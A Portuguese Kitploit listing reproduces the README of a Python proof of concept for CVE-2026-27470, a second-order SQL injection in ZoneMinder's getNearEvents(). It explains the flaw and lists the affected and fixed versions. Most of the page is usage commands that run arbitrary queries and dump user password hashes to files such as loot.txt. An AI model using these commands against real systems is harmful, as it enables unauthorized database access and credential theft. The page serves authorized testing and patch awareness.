Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/d3vn0mi/cve-2026-27470-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubd3vn0mi/cve-2026-27470-poc

CVE-2026-27470-POC

Python PoC para CVE-2026-27470, injeção SQL de segunda ordem autenticada em getNearEvents() (status.php) do ZoneMinder, CVSS 8.8

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-27470 — PoC de Injeção SQL de Segunda Ordem no ZoneMinder

Autor: d3vn0mi | CVSS 8.8 | Autenticado | Permissão de Eventos Necessária

Visão Geral

CVE-2026-27470 é uma vulnerabilidade de injeção SQL de segunda ordem no web/ajax/status.php do ZoneMinder — especificamente na função getNearEvents().

DetalheValor
AfetadoZoneMinder <= 1.36.37 e 1.37.61 – 1.38.0
Corrigido em1.36.38 / 1.38.1
TipoInjeção SQL de Segunda Ordem
AutenticaçãoSim (qualquer usuário com permissão de Eventos)
CVSS8.8 (Alto)

Como Funciona

A vulnerabilidade é uma injeção SQL de duas fases (segunda ordem):

  1. Fase 1 — Armazenamento: O atacante renomeia um evento (ou edita seu campo Cause) para conter um payload SQL. O ZoneMinder usa uma consulta parametrizada para essa gravação, então o payload é armazenado com segurança no banco de dados — nenhum WAF ou filtro o bloqueia.

  2. Fase 2 — Gatilho: O atacante solicita a entidade nearevents por meio da API de status. A função getNearEvents() lê o Nome/Cause do evento armazenado no banco de dados e o concatena diretamente em uma nova consulta SQL sem sanitização, resultando em injeção SQL.

Como o vetor de injeção (dados armazenados) é separado do gatilho (uma solicitação GET limpa), isso contorna a maioria das proteções no nível de entrada.

Instalação

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-27470-POC.git
cd CVE-2026-27470-POC
pip install -r requirements.txt

Uso

Básico — Extrair Versão do Banco de Dados

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password

Consulta SQL Personalizada

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"

Despejar Todos os Usuários e Hashes de Senha

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users

As credenciais são salvas em dumped_creds.txt por padrão.

Salvar Resultados em um Arquivo Personalizado

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users -o loot.txt
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT @@datadir" -o result.txt

Rota Através de um Proxy (Burp / mitmproxy)

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --proxy http://127.0.0.1:8080

Usar o Campo Cause em Vez de Name

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --field Cause --query "SELECT database()"

Especificar um ID de Evento Manualmente

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --event-id 42

Saída Verbosa / Depuração

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password -v

Opções

FlagDescriçãoPadrão
-t, --targetURL do alvo(obrigatório)
-u, --usernameNome de usuário do ZoneMinder(obrigatório)
-p, --passwordSenha do ZoneMinder(obrigatório)
--queryConsulta SQL a executarSELECT VERSION()
--dump-usersDespejar todos os nomes de usuário e hashes de senha
-o, --outputSalvar resultados em arquivodumped_creds.txt
--event-idID do evento a usar como vetor de injeção(detecção automática)
--fieldCampo de injeção: Name ou CauseName
--no-restoreNão restaurar o nome do evento após a exploração
--proxyURL do proxy HTTP
--timeoutTempo limite da solicitação em segundos30
-v, --verboseAtivar registro de depuração

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa de segurança autorizada. Não a use contra sistemas que você não possui ou para os quais não tenha permissão explícita por escrito para testar. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.

Referências

  • Site Oficial do ZoneMinder
  • Repositório GitHub do ZoneMinder
Baixar ferramenta